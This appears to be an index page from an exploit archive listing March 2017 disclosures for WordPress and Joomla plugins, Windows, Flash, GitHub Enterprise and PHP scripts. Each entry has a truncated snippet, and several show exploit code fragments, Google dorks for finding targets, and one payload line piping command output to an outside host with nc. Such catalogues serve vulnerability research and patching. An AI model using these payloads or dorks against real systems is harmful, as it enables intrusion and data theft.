Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download

Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download import requests import string import random from urlparse import urlparse print "---------------------------------------------------------------------" print "Wordpress Plugin Membership Simplified v1.58 - Arbitrary File...

Microsoft Windows DVD Maker 6.1.7 - XML External Entity Injection

Microsoft Windows DVD Maker 6.1.7 - XML External Entity Injection + Credits: John Page AKA hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-DVD-MAKER-XML-EXTERNAL-ENTITY-FILE-DISCLOSURE.txt + ISR: ApparitionSec Vendor: =================...

Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free

Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free f.onload = null; for var x in window if whitelist.indexOfx != -1 continue; try window.lookupGetterx.callf.contentWindow; logx; catch e ; f.src = "https://abc.xyz/"; document.body.appendChildf; And after some plays, finally reached an...

CommVault Edge 11 SP6 - Stack Buffer Overflow (PoC)

CommVault Edge 11 SP6 - Stack Buffer Overflow PoC import socket import binascii import time import struct s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.settimeout1 s.connect"10.101.0.85", 8400 def srp=None, r=None: if p: print "sending %d bytes: %s " % lenp/2,p payl = binascii.a2bhexp...

Cerberus FTP Server 8.0.10.3 - MLST Buffer Overflow (PoC)

Cerberus FTP Server 8.0.10.3 - MLST Buffer Overflow PoC + Title: Cerberus FTP Server 8.0.10.3 – 'MLST' Remote Buffer Overflow + Credits / Discovery: Nassim Asrir + Author Contact: [email protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/ + Author Company: Henceforth + CVE:...

Cobbler 2.8.0 - (Authenticated) Remote Code Execution

Cobbler 2.8.0 - Authenticated Remote Code Execution !/usr/bin/python """ Exploit title: Cobbler 2.8.x Authenticated RCE. Author: Dolev Farhi Contact: dolevf at protonmail.com @hack6tence Date: 03-16-2017 Vendor homepage: cobbler.github.io Software version: v.2.5.160805 Software Description...

Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)

Microsoft Windows - COM Session Moniker Privilege Escalation MS17-012 / Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1021 Windows: COM Session Moniker EoP Platform: Tested on Windows 10 14393, Server 2012 R2 Class: Elevation of Privilege Summary: When activating an object usi...

Adobe Flash - MovieClip Attach init Object Use-After-Free

Adobe Flash - MovieClip Attach init Object Use-After-Free Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1006 The attached file causes a use-after-free in attaching a MovieClip and applying the init object. Proof of Concept:...

Microsoft Windows - LoadUvsTable() Heap Buffer Overflow

Microsoft Windows - LoadUvsTable Heap Buffer Overflow Date: 15-03-2017 Author: Hossein Lotfi https://twitter.com/hosselot CVE: CVE-2016-7274 1. Description An integer overflow error within the "LoadUvsTable" function of usp10.dll can be exploited to cause a heap-based buffer overflow. Full analys...

GitHub Enterprise 2.8.7 - Remote Code Execution

GitHub Enterprise 2.8.7 - Remote Code Execution !/usr/bin/python from urllib import quote ''' set up the marshal payload from IRB code = "id | nc orange.tw 12345" p "\x04\x08" + "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" + ":\x0E@instance" + "o"+":\x08ERB"+"\x07...

Adobe Flash - ATF Thumbnailing Heap Overflow

Adobe Flash - ATF Thumbnailing Heap Overflow Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1015 The attached file causes an overflow in heap thumbnailing. To reproduce, place both attached files on a server and visit http://127.0.0.1/LoadImage.swf?img=thumb2.atf Proof of...

Joomla! Component Vik Appointments 1.5 - SQL Injection

Joomla! Component Vik Appointments 1.5 - SQL Injection Exploit Title: Joomla! Component Vik Appointments v1.5 - SQL Injection Google Dork: inurl:index.php?option=comvikappointments Date: 15.03.2017 Vendor Homepage: https://extensionsforjoomla.com/ Software :...

GitHub Enterprise 2.8.0 2.8.6 - Remote Code Execution

GitHub Enterprise 2.8.0 2.8.6 - Remote Code Execution !/usr/bin/ruby require "openssl" require "cgi" require "net/http" require "uri" SECRET = "641dd6454584ddabfed6342cc66281fb" puts ' . . ' puts ' \ | | | ' puts '/ \\ / /\ \ | | | | | / \ ' puts '\ / /\ \ / /// \ ' puts ' / / / / / '...

PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Local Privilege Escalation

PCAUSA Rawether ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64 - Local Privilege Escalation Exploit Title: PCAUSA Rawether for Windows local privilege escalation Date: 2017-03-15 Exploit Author: ReWolf Vendor Homepage: original vendor website doesn't exist anymore Version: too many Tested on:...

Sitecore CMS 8.1 Update-3 - Cross-Site Scripting

Sitecore CMS 8.1 Update-3 - Cross-Site Scripting Exploit Title: Stored Cross Site Scripting XSS in Sitecore Experience Platform 8.1 Update-3 Date: March 15, 2017 Exploit Author: Pralhad Chaskar Vendor Homepage: http://www.sitecore.net/en Version: 8.1 rev. 160519 Tested on: Sitecore Experience...

Adobe Flash - ATF Planar Decompression Heap Overflow

Adobe Flash - ATF Planar Decompression Heap Overflow Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1016 The attached file causes heap corruption when decompressing a planar block. To reproduce the issue, but both attached files on a server and visit:...

Adobe Flash - AVC Header Slicing Heap Overflow

Adobe Flash - AVC Header Slicing Heap Overflow Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1017 There is a heap overflow in AVC header slicing. To reproduce the issue, put the attached files on a server and visit http://127.0.0.1/LoadImage.swf?img=slice.flv Proof of Concept:...

Joomla! Component Vik Rent Items 1.3 - SQL Injection

Joomla! Component Vik Rent Items 1.3 - SQL Injection Exploit Title: Joomla! Component Vik Rent Items v1.3 - SQL Injection Google Dork: inurl:index.php?option=comvikrentitems Date: 15.03.2017 Vendor Homepage: https://extensionsforjoomla.com/ Software :...

Adobe Flash - Metadata Parsing Out-of-Bounds Read

Adobe Flash - Metadata Parsing Out-of-Bounds Read Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1005 The attached file causes an out-of-bounds read when its metadata is parsed Proof of Concept:...

Joomla! Component Vik Rent Car 1.11 - SQL Injection

Joomla! Component Vik Rent Car 1.11 - SQL Injection Exploit Title: Joomla! Component Vik Rent Car v1.11 - SQL Injection Google Dork: inurl:index.php?option=comvikrentcar Date: 15.03.2017 Vendor Homepage: https://extensionsforjoomla.com/ Software :...

Joomla! Component Advertisement Board 3.0.4 - id SQL Injection

Joomla! Component Advertisement Board 3.0.4 - id SQL Injection Exploit Title: Joomla! Component Advertisement Board v3.0.4 - SQL Injection Google Dork: inurl:index.php?option=comadvertisementboard Date: 14.03.2017 Vendor Homepage: http://ordasoft.com/ Software :...

APNGDis 2.8 - image width height chunk Heap Buffer Overflow

APNGDis 2.8 - image width height chunk Heap Buffer Overflow Exploit Title: APNGDis image width / height Buffer Overflow Date: 14-03-2017 Exploit Author: Alwin Peppels Vendor Homepage: http://apngdis.sourceforge.net/ Software Link: https://sourceforge.net/projects/apngdis/files/2.8/ Version: 2.8...

APNGDis 2.8 - chunk size descriptor Heap Buffer Overflow

APNGDis 2.8 - chunk size descriptor Heap Buffer Overflow Exploit Title: APNGDis chunk size descriptor Buffer Overflow Date: 14-03-2017 Exploit Author: Alwin Peppels Vendor Homepage: http://apngdis.sourceforge.net/ Software Link: https://sourceforge.net/projects/apngdis/files/2.8/ Version: 2.8...

Joomla! Component Simple Membership 3.3.3 - userId SQL Injection

Joomla! Component Simple Membership 3.3.3 - userId SQL Injection Exploit Title: Joomla! Component Simple Membership v3.3.3 - SQL Injection Google Dork: inurl:index.php?option=comsimplemembership Date: 14.03.2017 Vendor Homepage: http://ordasoft.com/ Software :...

APNGDis 2.8 - filename Stack Buffer Overflow (PoC)

APNGDis 2.8 - filename Stack Buffer Overflow PoC Exploit Title: APNGDis filename Buffer Overflow Date: 14-03-2017 Exploit Author: Alwin Peppels Vendor Homepage: http://apngdis.sourceforge.net/ Software Link: https://sourceforge.net/projects/apngdis/files/2.8/ Version: 2.8 Tested on: Linux Debian ...

Cerberus FTP Server 8.0.10.1 - Denial of Service

Cerberus FTP Server 8.0.10.1 - Denial of Service Exploit Title: Cerberus FTP server – Denial of Service Date: 2017-03-13 Exploit Author: Peter Baris Vendor Homepage: https://www.cerberusftp.com/ Software Link: download link if available Version: 8.0.10.1 Tested on: Windows Server 2008 R2 Standard...

Oracle VM VirtualBox - Cooperating VMs can Escape from Shared Folder

Oracle VM VirtualBox - Cooperating VMs can Escape from Shared Folder Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1037 There is a security issue in the shared folder implementation that permits cooperating guests with write access to the same shared folder to gain access to t...

Car Workshop System - SQL Injection

Car Workshop System - SQL Injection Exploit Title: Car Workshop System - SQL Injection Google Dork: N/A Date: 13.03.2017 Vendor Homepage: http://prosoft-apps.com/ Software: https://codecanyon.net/item/car-workshop-system/19562074 Demo: http://workshop.prosoft-apps.com/ Version: N/A Tested on: Win...

Steam Profile Integration 2.0.11 - SQL injection

Steam Profile Integration 2.0.11 - SQL injection Exploit Title: IPS Community Suite - Steam Profile Integration 2.0.11 and below SQL injection Google Dork: inurl:tab=nodesteamsteamprofile Date: 13/03/2017 Exploit Author: DrWhat Vendor Homepage:...

Easy MOV Converter 1.4.24 - Local Buffer Overflow (SEH)

Easy MOV Converter 1.4.24 - Local Buffer Overflow SEH !/usr/bin/python Exploit Title : Easy MOV Converter - 'Enter User Name' Field SEH Overwrite POC Date : 12/03/2017 Exploit Author : Muhann4d Vendor Homepage : http://www.divxtodvd.net/ Software Link : http://www.divxtodvd.net/easymovconverter.e...

Nintendo Switch - WebKit Code Execution (PoC)

Nintendo Switch - WebKit Code Execution PoC CVE-2016-4657 Switch PoC body font-size: 2em; a text-decoration: none; color: 000; a:hover color: f00; font-weight: bold; CVE-2016-4657 Nintendo Switch PoC go! reload waiting... click go. // display JS errors as alerts. Helps debugging. window.onerror =...

Domain Marketplace Script - SQL Injection

Domain Marketplace Script - SQL Injection Exploit Title: Domain Marketplace Script - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: http://scripteen.com/ Software: http://scripteen.com/item/scripts/scripteen-domain-marketplace-script.html Demo: http://dwm.domainauctionsscript.co...

Vanelo - SQL Injection

Vanelo - SQL Injection Exploit Title: Vanelo – Wanelo Clone - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.zoplay.com/ Software: https://www.zoplay.com/web/trending-marketplace-website/ Demo: http://wanelo.zoplay.com/ Version: N/A Tested on: Win7 x64, Kali Linux x6...

MobaXterm Personal Edition 9.4 - Directory Traversal

MobaXterm Personal Edition 9.4 - Directory Traversal + Credits: John Page AKA hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MOBAXTERM-TFTP-PATH-TRAVERSAL-REMOTE-FILE-ACCESS.txt + ISR: ApparitionSec Vendor: =====================...

Travel Tours Script 2.0 - SQL Injection

Travel Tours Script 2.0 - SQL Injection Exploit Title: Travel Tours Script v2.0 - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.phpjabbers.com/ Software: https://www.phpjabbers.com/travel-tours-script/ Demo: http://demo.phpjabbers.com/index.php?demo=vpl&front=1&lid=...

Pet Listing Script 3.0 - SQL Injection

Pet Listing Script 3.0 - SQL Injection Exploit Title: Pet Listing Script v3.0 - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.phpjabbers.com/ Software: https://www.phpjabbers.com/pet-listing-script/ Demo: http://demo.phpjabbers.com/index.php?demo=petls&front=1&lid=1...

Mirage - SQL Injection

Mirage - SQL Injection Exploit Title: Mirage – Fancy Clone - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.zoplay.com/ Software: https://www.zoplay.com/web/multi-vendor-clone-website/ Demo: http://fancyclone.zoplay.com/ Version: N/A Tested on: Win7 x64, Kali Linux x...

Property Listing Script 3.1 - SQL Injection

Property Listing Script 3.1 - SQL Injection Exploit Title: Property Listing Script v3.1 - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.phpjabbers.com/ Software: https://www.phpjabbers.com/property-listing-script/ Demo:...

Global In - SQL Injection

Global In - SQL Injection Exploit Title: Global In – A LinkedIn Clone - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.techbizstudio.com/ Software: https://www.techbizstudio.com/product/linkedin-clone/ Demo: https://www.techbizstudio.com/demo/globalin/ Version: N/A...

Yellow Pages Script 3.2 - category_id SQL Injection

Yellow Pages Script 3.2 - categoryid SQL Injection Exploit Title: Yellow Pages Script v3.2 - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.phpjabbers.com/ Software: https://www.phpjabbers.com/yellow-pages-script/ Demo:...

Global In - Arbitrary File Upload

Global In - Arbitrary File Upload Exploit Title: Global In - Arbitrary File Upload Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.techbizstudio.com/ Software: https://www.techbizstudio.com/product/linkedin-clone/ Demo: https://www.techbizstudio.com/demo/globalin/ Version: N/A Test...

PHP Forum Script 3.0 - SQL Injection

PHP Forum Script 3.0 - SQL Injection Exploit Title: PHP Forum Script v3.0 - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.phpjabbers.com/ Software: https://www.phpjabbers.com/php-forum-script/ Demo: http://demo.phpjabbers.com/index.php?demo=pfs&front=1&lid=1 Version...

Fiyo CMS 2.0.6.1 - Privilege Escalation

Fiyo CMS 2.0.6.1 - Privilege Escalation Exploit Title: Fiyo CMS 2.0.6.1 allows remote authenticated users to gain privileges via a modified level parameter Google Dork: no Date: 11-03-2017 Exploit Author: @runggareksya, @dvnrcy Vendor Homepage: http://www.fiyo.org Software Link:...

Fortinet FortiClient 5.2.3 (Windows 10 x86) - Local Privilege Escalation

Fortinet FortiClient 5.2.3 Windows 10 x86 - Local Privilege Escalation...

Yacht Listing Script 2.0 - SQL Injection

Yacht Listing Script 2.0 - SQL Injection Exploit Title: Yacht Listing Script v2.0 - SQL Injection Google Dork: N/A Date: 11.03.2017 Vendor Homepage: https://www.phpjabbers.com/ Software: https://www.phpjabbers.com/yacht-listing-script/ Demo:...

Kinsey InforLawson ESBUS - SQL Injection

Kinsey InforLawson ESBUS - SQL Injection Exploit Title: Kinsey Infor / Lawson ESBUS - Multiple SQL Injections Date: 3/10/2017 Exploit Author: Michael Benich Vendor homepage: http://www.kinsey.com/infor-lawson.html Version: ALL Tested on: Windows Server 2008 R2; MySQL ver 5.5 CVE: CVE-2017-6550...

dnaLIMS DNA Sequencing - Directory Traversal Session Hijacking Cross-Site Scripting

dnaLIMS DNA Sequencing - Directory Traversal Session Hijacking Cross-Site Scripting Title: Multiple vulnerabilities discovered in dnaLIMS DNA sequencing web-application Advisory URL: https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/ Date published: Mar 08, 2017...

FTP Voyager Scheduler 16.2.0 - Cross-Site Request Forgery

FTP Voyager Scheduler 16.2.0 - Cross-Site Request Forgery !-- + Credits: John Page AKA hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/FTP-VOYAGER-SCHEDULER-CSRF-REMOTE-CMD-EXECUTION.txt + ISR: ApparitionSec Vendor: ============== solarwinds.com...

WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery

WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery !-- KL-001-2017-004 : WatchGuard XTMv User Management Cross-Site Request Forgery Title: WatchGuard XTMv User Management Cross-Site Request Forgery Advisory ID: KL-001-2017-004 Publication Date: 2017.03.10 Publication...

BistroStays 3.0 - guests SQL Injection

BistroStays 3.0 - guests SQL Injection Exploit Title: BistroStays - Vacation Rental Software v3.0 - SQL Injection Google Dork: N/A Date: 09.03.2017 Vendor Homepage: https://www.ncrypted.net/ Software: https://www.ncrypted.net/bistrostays Demo: http://demo.ncryptedprojects.com/bistrostaysv3/...